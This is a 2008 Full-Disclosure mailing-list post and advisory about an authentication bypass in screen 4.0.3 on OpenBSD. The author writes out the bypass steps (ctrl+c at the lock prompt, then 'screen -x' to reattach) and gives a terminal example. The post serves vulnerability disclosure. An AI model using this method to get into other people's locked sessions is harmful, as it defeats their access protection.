[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] screen 4.03 password bypass vuln - UPDATE (for you sec dudes...)
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] screen 4.03 password bypass vuln - UPDATE (for you sec dudes...)
- From: "rembrandt" <rembrandt@xxxxxxxxxxx>
- Date: Wed, 18 Jun 2008 17:01:47 +0200 (CEST)
Well I improved the advisory I released a while ago after I found serval
websites wich claim that this is a fake/myth sec. problem because they
where not able to reproduce it onto their boxes...
The updated version is avaiable at milw0rm (thanks to str0ke) and I
recomment that all who mirrored the article do update.
milw0rm link:
http://www.milw0rm.com/exploits/4028
I even included a lil example to make it fool proof... I was realy
impressed that some do think it's a fake/myth and claim that onto their
website.
So it would be nice if the guys at osvdb.org (and others) may do update
their articles, rating and what else matters for them to correct their
statements....
I named a now OS and how to reproduce it.
So feel free to install oBSD in a VM. ;]
The new version of the "improved" advisory is attached too for your
convenience. The bug itself is still the old one....
Kind regards,
Rembrandt
_ _ _____ _ ___ _____ _ _
/ / / / ____/ / / _/_ __/ / / /
/ /_/ / __/ / / / / / / / /_/ /
/ __ / /___/ /____/ / / / / __ /
/_/ /_/_____/_____/___/ /_/ /_/ /_/
Helith - 0815
--------------------------------------------------------------------------------
Author: Rembrandt
Date : Known since somewhere in &cant_remember (some years, realy..)
Affected Software: screen <= 4.0.3
Affected OS : OpenBSD (any up to current (wich will become oBSD 4.4))
Type: Local
Type: Authentication Bypass
Greets go to: Helith and all affiliated/loyal people
I did not found a Advisory related to this so I decided to write a leet one.
screen is vulnerable to a authentication bypass which allows local attackers
to gain system access in case screen was locked with a password.
It has been tested on OpenBSD + screen 4.0.3 on x86/amd64.
But during the nature of the behavior of screen and OpenBSD it should be
architecture/version indipendent for now.
How to check this?
Lock screen using ctrl+x
Choose a Password
Confirm the Password
Screen asks for a Password to unlock the screen.
Just press ctrl+c and if you like screen-x to reattach the screen-session.
Example:
$ testscreen
/bin/ksh: testscreen: not found
$
Key:
Again:
Screen used by rembrandt <rembrandt>.
Password: <ctrl-c here>
$ screen -x
There are several suitable screens on:
29602.ttyC0.raven (Attached)
25144.ttyC1.raven (Detached)
Type "screen [-d] -r [pid.]tty.host" to resume one of them.
$ screen -x 25144
$ testscreen
/bin/ksh: testscreen: not found
$
Because of the nature of a locked screen you wont be able to lock your shell.
screen will never ask you for a password.
Of course this works also if you get access to a SSH wich has a locked
screen running. So in case you have locked your screen session wich contains
a open SSH session to a host where you also have a locked screen session
you might have no password protection at all in case all systems are OpenBSD.
That is just another example. Importent for you should be the combination of
screen and OpenBSD.
Do not claim it does not work because you just tested this against the latest
Linux/Solaris/Whatever.
It is known to work and I mentioned the OS.
Still it is known that it worked against some scarry Linux distributions
wich are not realy common.
All security websites wich do report this is a fake may consider to update their
reports except of simply claiming wrong things.
Have fun!
Kind regards,
Rembrandt_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/